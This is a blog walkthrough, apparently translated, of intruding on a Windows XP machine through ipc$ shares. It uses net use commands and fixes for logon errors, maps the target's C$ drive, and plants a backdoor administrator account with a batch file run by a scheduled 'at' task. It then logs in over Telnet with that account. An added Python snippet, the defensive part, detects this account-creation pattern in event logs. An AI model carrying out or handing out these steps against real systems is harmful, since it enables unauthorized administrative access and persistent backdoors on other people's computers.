Test environment: host (Windows XP SP3) with a Windows XP virtual machine.
With ipc$ and Windows XP, problems come up on the vast majority of XP systems today. Here is how to solve the series of problems that arise when establishing an ipc$ connection. With ipc$ (Internet process connection), many machines have the default shares open. Run the net share command under CMD and you will find a lot of shares ending in $: "ipc$, admin$, C$, d$ ..." (very dangerous).
Now to the point:
1. net use \\<target IP>\ipc$
Error 53: the network path was not found. (The target host has the system firewall or other firewall software turned on. Resolution: shut down the target firewall.)
Error 1326:
1) Connecting with net use \\<target IP>\ipc$ "" /user:"Administrator" reports system error 1326, "Logon failure: unknown user name or bad password." Check whether the command or the user name is wrong. In this case nothing was wrong with either.
2) On the remote machine, under "Control Panel - Folder Options - View", clear the "Simple File Sharing" option, then try to connect again. Simple File Sharing classifies network connections as guest connections, which cannot access administrative shares such as ipc$. This turned out to be the cause, and the error was corrected.
Error 1327 may also occur: "Logon failure: user account restriction." Possible causes include blank passwords not being allowed, logon hour restrictions, or an enforced policy restriction. On the remote machine, under Control Panel - Administrative Tools - Local Security Policy - Security Options - User Rights Assignment, disable "Empty password user can only log on console".
Map the other side's default C drive share: net use Z: \\<target IP>\c$
A network drive will appear in My Computer.
When finished with ipc$, delete the ipc$ connection: net use \\<target IP>\ipc$ /del
On this basis, leave a backdoor account on the target computer:
Write a batch file and copy it to the other computer, then add a scheduled task to execute the batch file.
Batch commands (save as adduser.bat):
rem Add user Nebulastest with password 123456
net user Nebulastest 123456 /add
rem Give user Nebulastest administrator permissions
net localgroup Administrators Nebulastest /add
Then execute this command on the local machine (the ipc$ connection has already been established): copy adduser.bat \\<target IP>\c$
Then check the time on the target computer: net time \\<target IP>
Then add a scheduled task on the target computer: at \\<target IP> <execution time> C:\adduser.bat
Delete the current ipc$ connection, then establish a new ipc$ connection with the new user and the new password to test whether the account was created successfully.
net use \\<target IP>\ipc$ "123456" /user:"Nebulastest"
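A defender's view of the account steps above, as an added example that is not part of the original article: it flags an account that is created and then added to Administrators within minutes, and records later network logons by that account. The event records are constructed and assumed to be pre-normalized by a log collector (the field names are hypothetical); 624/636/540 are the XP-era Security log event IDs and 4720/4732/4624 their later equivalents.

```python
from datetime import datetime, timedelta

# Legacy (XP/2003) Security log IDs mapped to their Vista+ equivalents.
LEGACY = {624: 4720, 636: 4732, 540: 4624}
CREATED, ADMIN_ADD, LOGON = 4720, 4732, 4624
WINDOW = timedelta(minutes=10)

# Constructed, pre-normalized sample records (not real log data).
EVENTS = [
    {"t": "2015-11-13 10:02:00", "id": 624, "host": "XP-VM", "account": "Nebulastest"},
    {"t": "2015-11-13 10:02:01", "id": 636, "host": "XP-VM", "account": "Nebulastest",
     "group": "Administrators"},
    {"t": "2015-11-13 10:05:30", "id": 540, "host": "XP-VM", "account": "Nebulastest",
     "logon_type": 3, "src": "192.0.2.10"},
    {"t": "2015-11-13 11:00:00", "id": 4720, "host": "PC-2", "account": "intern"},
    {"t": "2015-11-13 11:00:05", "id": 4732, "host": "PC-2", "account": "intern",
     "group": "Users"},
]

def find_backdoor_accounts(events, window=WINDOW):
    """Flag accounts created and made local admin within `window`;
    collect the source of any network logon by that account afterwards."""
    created, alerts = {}, {}
    for ev in sorted(events, key=lambda e: e["t"]):
        eid = LEGACY.get(ev["id"], ev["id"])
        when = datetime.strptime(ev["t"], "%Y-%m-%d %H:%M:%S")
        key = (ev["host"], ev["account"].lower())
        if eid == CREATED:
            created[key] = when
        elif eid == ADMIN_ADD and ev.get("group", "").lower() == "administrators":
            if key in created and when - created[key] <= window:
                alerts[key] = {"host": ev["host"], "account": ev["account"],
                               "created": created[key], "remote_logons": []}
        elif eid == LOGON and ev.get("logon_type") == 3 and key in alerts:
            alerts[key]["remote_logons"].append(ev.get("src", "unknown"))
    return list(alerts.values())

if __name__ == "__main__":
    for a in find_backdoor_accounts(EVENTS):
        print(f"{a['host']}: '{a['account']}' created and added to Administrators; "
              f"network logons from {a['remote_logons'] or 'none yet'}")
```

These events are only written when account management and logon auditing are enabled in the local audit policy.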
Log in using Telnet (prerequisite: the target computer has the Telnet service turned on):
Double-click the Telnet service - select Automatic - click Start
On the command line, enter: telnet <target IP>
When the login prompt appears, choose y, then enter the user name and password (the backdoor account).
The password is not shown as you type it, but it is verified automatically after you press Enter.
The password has been entered but will not be displayed:
Post-Login interface:
This article is from the "ZPP" blog; please keep this source: http://1439337369.blog.51cto.com/10270624/1712719
Using ipc$ shares to intrude on Windows XP: a practical exercise